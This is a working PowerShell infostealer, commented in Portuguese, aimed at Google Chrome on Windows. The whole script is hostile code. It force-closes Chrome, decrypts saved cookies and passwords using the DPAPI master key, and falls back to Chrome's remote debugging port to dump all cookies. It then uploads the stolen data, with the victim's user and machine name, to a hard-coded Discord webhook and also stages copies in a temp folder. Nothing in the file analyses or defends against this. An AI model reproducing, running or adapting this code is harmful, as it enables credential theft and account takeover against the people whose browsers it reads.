$w="https://discord.com/api/webhooks/1503748038915522710/OaPmBZZTpD_TSm2m5YtSYIM3PU7f2_WLzAOIu6kDPwd45adNZdkGd8jMoutFQP1Ol-P9";$d=Get-Date -Format "HH:mm:ss";Write-Host "[$d] Chrome v20 Extractor";Write-Host "[$d] User: $env:USERNAME@$env:COMPUTERNAME"
Get-Process chrome -ErrorAction SilentlyContinue | Stop-Process -Force;Start-Sleep -Seconds 2
$p="$env:LOCALAPPDATA\Google\Chrome\User Data\Local State";$ak="";$ek=""
if (Test-Path $p){$j=Get-Content $p -Raw|ConvertFrom-Json;$ak=$j.os_crypt.app_bound_encrypted_key;$ek=$j.os_crypt.encrypted_key;Write-Host "[$d] encrypted_key: $($ek -ne $null) | app_bound: $($ak -ne $null)"}
if(!$ak){Write-Host "[$d] app_bound_encrypted_key nao encontrado, tentando metodo alternativo...";$d2=Get-Date -Format "HH:mm:ss"
# Fallback: tentar DPAPI normal
if($ek){$raw=[Convert]::FromBase64String($ek);if($raw[0]-eq 1 -and $raw.Length -gt 5){try{$mk=[System.Security.Cryptography.ProtectedData]::Unprotect($raw[5..($raw.Length-1)],$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);Write-Host "[$d2] DPAPI v10 OK!";if($mk.Length -ge 32){$mk=$mk[0..31]
# Descriptografa cookies com a chave DPAPI
$cu="$env:LOCALAPPDATA\Google\Chrome\User Data";$cookies=@();$logins=@()
foreach($pr in @("Default","Profile 1")){$cdb="$cu\$pr\Cookies";$ldb="$cu\$pr\Login Data"
if(Test-Path $cdb){$tmp="$env:TEMP\c_$(Get-Random).db";Copy-Item $cdb $tmp -Force;try{Add-Type -AssemblyName "Microsoft.Data.Sqlite" -ErrorAction Stop;$cn=New-Object Microsoft.Data.Sqlite.SqliteConnection("Data Source=$tmp");$cn.Open();$cmd=$cn.CreateCommand();$cmd.CommandText="SELECT host_key,name,path,encrypted_value FROM cookies";$rd=$cmd.ExecuteReader();while($rd.Read()){$eb=$rd["encrypted_value"];if($eb -is [string]){continue};$ea=[byte[]]$eb;if($ea.Length -lt 15){continue};try{if($ea[0]-eq 1){$c=$ea[3..($ea.Length-1)];$dc=[System.Security.Cryptography.ProtectedData]::Unprotect($c,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);$v=[System.Text.Encoding]::UTF8.GetString($dc);$cookies+=@{host=$rd["host_key"];name=$rd["name"];value=$v;path=$rd["path"]}}elseif($ea[0]-eq 2 -or $ea[0]-eq 3){$n=$ea[3..14];$cl=$ea.Length-15-16;if($cl -gt 0){$c=$ea[15..(15+$cl-1)];$t=$ea[(15+$cl)..($ea.Length-1)];$a=[System.Security.Cryptography.AesGcm]::new($mk,16);$r=[byte[]]::new($cl);$a.Decrypt($n,$c,$t,$r);$a.Dispose();$v=[System.Text.Encoding]::UTF8.GetString($r);$cookies+=@{host=$rd["host_key"];name=$rd["name"];value=$v;path=$rd["path"]}}}catch{}};$rd.Close();$cn.Close()}catch{}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue}}
if(Test-Path $ldb){$tmp2="$env:TEMP\l_$(Get-Random).db";Copy-Item $ldb $tmp2 -Force;try{Add-Type -AssemblyName "Microsoft.Data.Sqlite" -ErrorAction Stop;$cn2=New-Object Microsoft.Data.Sqlite.SqliteConnection("Data Source=$tmp2");$cn2.Open();$cmd2=$cn2.CreateCommand();$cmd2.CommandText="SELECT origin_url,username_value,password_value FROM logins";$rd2=$cmd2.ExecuteReader();while($rd2.Read()){$pb=$rd2["password_value"];if($pb -is [string]){$pb=[System.Text.Encoding]::UTF8.GetBytes($pb)};if($pb.Length -lt 15){continue};try{if($pb[0]-eq 1){$c=$pb[3..($pb.Length-1)];$dc=[System.Security.Cryptography.ProtectedData]::Unprotect($c,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);$v=[System.Text.Encoding]::UTF8.GetString($dc);$logins+=@{url=$rd2["origin_url"];username=$rd2["username_value"];password=$v}}elseif($pb[0]-eq 2 -or $pb[0]-eq 3){$n=$pb[3..14];$cl=$pb.Length-15-16;if($cl -gt 0){$c=$pb[15..(15+$cl-1)];$t=$pb[(15+$cl)..($pb.Length-1)];$a=[System.Security.Cryptography.AesGcm]::new($mk,16);$r=[byte[]]::new($cl);$a.Decrypt($n,$c,$t,$r);$a.Dispose();$v=[System.Text.Encoding]::UTF8.GetString($r);$logins+=@{url=$rd2["origin_url"];username=$rd2["username_value"];password=$v}}}catch{}};$rd2.Close();$cn2.Close()}catch{}finally{Remove-Item $tmp2 -Force -ErrorAction SilentlyContinue}}}
Write-Host "[$d2] Cookies: $($cookies.Count) | Logins: $($logins.Count)"
$b="----Boundary"+[System.Guid]::NewGuid().ToString().Replace("-","");$bo=@();$bo+="--$b";$bo+='Content-Disposition: form-data; name="payload_json"';$bo+="";$bo+=('{"content":"Chrome v10 DPAPI | '+$env:USERNAME+'@'+$env:COMPUTERNAME+' | Cookies: '+$cookies.Count+' | Logins: '+$logins.Count+'"}')
if($cookies.Count -gt 0){$c=($cookies|ConvertTo-Json -Depth 3);$bo+="--$b";$bo+='Content-Disposition: form-data; name="file"; filename="cookies.json"';$bo+="Content-Type: application/json";$bo+="";$bo+=$c}
if($logins.Count -gt 0){$l=($logins|ConvertTo-Json -Depth 3);$bo+="--$b";$bo+='Content-Disposition: form-data; name="file"; filename="logins.json"';$bo+="Content-Type: application/json";$bo+="";$bo+=$l}
$bo+="--$b--";$bs=$bo -join "`r`n";$bb=[System.Text.Encoding]::UTF8.GetBytes($bs);try{$wc=New-Object Net.WebClient;$wc.Headers.Add("Content-Type","multipart/form-data; boundary=$b");$wc.UploadData($w,"POST",$bb)|Out-Null;$wc.Dispose();Write-Host "[$d2] Enviado ao Discord!"}catch{Write-Host "[$d2] Erro Discord"}
$outDir="$env:TEMP\chrome_extracted";if(!(Test-Path $outDir)){New-Item -ItemType Directory -Path $outDir -Force|Out-Null}
$cookies|ConvertTo-Json -Depth 3|Out-File (Join-Path $outDir "cookies.json") -Encoding UTF8;$logins|ConvertTo-Json -Depth 3|Out-File (Join-Path $outDir "logins.json") -Encoding UTF8
Write-Host "[$d2] Salvo em: $outDir";Write-Host "[$d2] Concluido!";exit}}catch{Write-Host "[$d2] DPAPI falhou"}}
# Se nao tem app_bound ou DPAPI falhou, tenta Chrome Debug
Write-Host "[$d] Chrome v20 detectado. Tentando Chrome Remote Debug..."
Get-Process chrome -ErrorAction SilentlyContinue | Stop-Process -Force;Start-Sleep -Seconds 2
$cu="$env:LOCALAPPDATA\Google\Chrome\User Data";$tmpProfile="$env:TEMP\chromedbg_"+(Get-Random -Max 99999);New-Item -ItemType Directory -Path $tmpProfile -Force|Out-Null
Copy-Item "$cu\Local State" "$tmpProfile\Local State" -Force
foreach($pr2 in @("Default","Profile 1")){$s="$cu\$pr2";$d="$tmpProfile\$pr2";if(Test-Path $s){New-Item -ItemType Directory -Path $d -Force -ErrorAction SilentlyContinue|Out-Null;foreach($f in @("Cookies","Cookies-journal","Login Data","Login Data-journal")){$sf=Join-Path $s $f;$df=Join-Path $d $f;if(Test-Path $sf){Copy-Item $sf $df -Force -ErrorAction SilentlyContinue}}}}
$ce="$env:ProgramFiles\Google\Chrome\Application\chrome.exe";if(!(Test-Path $ce)){$ce="${env:ProgramFiles(x86)}\Google\Chrome\Application\chrome.exe"};if(!(Test-Path $ce)){$ce="$env:LOCALAPPDATA\Google\Chrome\Application\chrome.exe"}
if(Test-Path $ce){$port=9222;try{$psi=New-Object System.Diagnostics.ProcessStartInfo;$psi.FileName=$ce;$psi.Arguments="--remote-debugging-port=$port --remote-allow-origins=* --headless --user-data-dir=$tmpProfile --no-first-run --disable-features=ChromeWhatsNewUI --disable-sync";$psi.WindowStyle=[System.Diagnostics.ProcessWindowStyle]::Hidden;$psi.CreateNoWindow=$true;$psi.UseShellExecute=$false;$proc=[System.Diagnostics.Process]::Start($psi);Start-Sleep -Seconds 4
$wsUrl=$null;for($att=0;$att -lt 10;$att++){try{$resp=Invoke-RestMethod "http://127.0.0.1:$port/json/version" -TimeoutSec 3;$wsUrl=$resp.webSocketDebuggerUrl;if($wsUrl){break}}catch{};Start-Sleep -Seconds 1}
if(!$wsUrl){try{$list=Invoke-RestMethod "http://127.0.0.1:$port/json" -TimeoutSec 3;if($list -and $list.Count -gt 0 -and $list[0].webSocketDebuggerUrl){$wsUrl=$list[0].webSocketDebuggerUrl}}catch{}}
if($wsUrl){Write-Host "[$d] WebSocket conectado!";$ws=New-Object System.Net.WebSockets.ClientWebSocket;$ws.ConnectAsync([System.Uri]$wsUrl,[System.Threading.CancellationToken]::None).Wait()
$msg='{"id":1,"method":"Network.getAllCookies"}';$ws.SendAsync([System.ArraySegment[byte]]::new([System.Text.Encoding]::UTF8.GetBytes($msg)),[System.Net.WebSockets.WebSocketMessageType]::Text,$true,[System.Threading.CancellationToken]::None).Wait()
$buf=[byte[]]::new(524288);$res=$ws.ReceiveAsync([System.ArraySegment[byte]]::new($buf),[System.Threading.CancellationToken]::None).Result;$respStr=[System.Text.Encoding]::UTF8.GetString($buf,0,$res.Count);$ws.Dispose()
$json=$respStr|ConvertFrom-Json;if($json.result -and $json.result.cookies){$allCookies=$json.result.cookies;Write-Host "[$d] Cookies via Debug: $($allCookies.Count)"
if($allCookies.Count -gt 0){$cc=$allCookies|ConvertTo-Json -Depth 3;$b="----Boundary"+[System.Guid]::NewGuid().ToString().Replace("-","");$bo=@();$bo+="--$b";$bo+='Content-Disposition: form-data; name="payload_json"';$bo+="";$bo+=('{"content":"Chrome v20 Debug | '+$env:USERNAME+'@'+$env:COMPUTERNAME+' | Cookies: '+$allCookies.Count+'"}');$bo+="--$b";$bo+='Content-Disposition: form-data; name="file"; filename="cookies.json"';$bo+="Content-Type: application/json";$bo+="";$bo+=$cc;$bo+="--$b--";$bs=$bo -join "`r`n";$bb=[System.Text.Encoding]::UTF8.GetBytes($bs);try{$wc=New-Object Net.WebClient;$wc.Headers.Add("Content-Type","multipart/form-data; boundary=$b");$wc.UploadData($w,"POST",$bb)|Out-Null;$wc.Dispose();Write-Host "[$d] Enviado ao Discord!"}catch{Write-Host "[$d] Erro Discord"}
$out="$env:TEMP\chrome_extracted";if(!(Test-Path $out)){New-Item -ItemType Directory -Path $out -Force|Out-Null};$cc|Out-File (Join-Path $out "cookies.json") -Encoding UTF8;Write-Host "[$d] Salvo em: $out"}}}catch{Write-Host "[$d] Chrome Debug falhou"};if($proc -and !$proc.HasExited){$proc.Kill()};Start-Sleep -Seconds 1;if(Test-Path $tmpProfile){Remove-Item $tmpProfile -Recurse -Force -ErrorAction SilentlyContinue}}}
# Ultimo recurso: copiar bancos brutos
$outDir2="$env:TEMP\chrome_extracted";if(!(Test-Path $outDir2)){New-Item -ItemType Directory -Path $outDir2 -Force|Out-Null}
Copy-Item "$cu\Local State" "$outDir2\Local State" -Force
foreach($pr3 in @("Default","Profile 1")){if(Test-Path "$cu\$pr3\Cookies"){Copy-Item "$cu\$pr3\Cookies" "$outDir2\$pr3-Cookies" -Force};if(Test-Path "$cu\$pr3\Login Data"){Copy-Item "$cu\$pr3\Login Data" "$outDir2\$pr3-Login Data" -Force}}
Write-Host "[$d] Dados brutos salvos em: $outDir2";Write-Host "[$d] Concluido!"
